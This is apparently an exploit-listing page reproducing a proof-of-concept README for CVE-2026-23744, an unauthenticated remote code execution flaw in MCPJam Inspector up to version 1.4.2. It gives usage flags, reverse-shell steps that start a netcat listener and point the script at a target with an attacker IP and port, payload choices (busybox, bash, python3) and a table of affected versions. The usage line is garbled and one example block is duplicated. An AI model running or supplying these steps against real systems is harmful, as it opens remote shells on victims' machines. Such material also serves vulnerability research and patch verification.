Share
## https://sploitus.com/exploit?id=254A6F19-4F33-5786-90FC-3146F3468F08
# CVE-2026-23744 โ MCPJam Inspector Unauthenticated RCE
  
MCPJam Inspector -i -p [-m ]
```
| Flag | Description | Default |
|------|-------------|---------|
| `-u` | Target URL | required |
| `-i` | Your listener IP (LHOST) | required |
| `-p` | Your listener port (LPORT) | required |
| `-m` | Payload method: `busybox`, `bash`, `python3` | `busybox` |
---
## Reverse Shell Example
**Step 1 โ Start your listener:**
```bash
nc -lvnp 443
```
**Step 2 โ Run the exploit:**
```bash
# bash
python3 POC.py -u http://127.0.0.1:6274 -i 10.10.10.10 -p 4444 -m bash
```
---
## Payload Methods
If `busybox` doesn't work on the target, try the other methods:
```bash
# bash
python3 POC.py -u http://127.0.0.1:6274 -i 10.10.10.10 -p 4444 -m bash
```
---
## Affected Versions
| Software | Vulnerable | Fixed |
|----------|------------|-------|
| MCPJam Inspector | <= 1.4.2 | 1.4.3 |
---
## References
- [CrowdSec CVE Tracker โ CVE-2026-23744](https://tracker.crowdsec.net/cves/CVE-2026-23744)
- [MCPJam Inspector GitHub](https://github.com/MCPJam/inspector)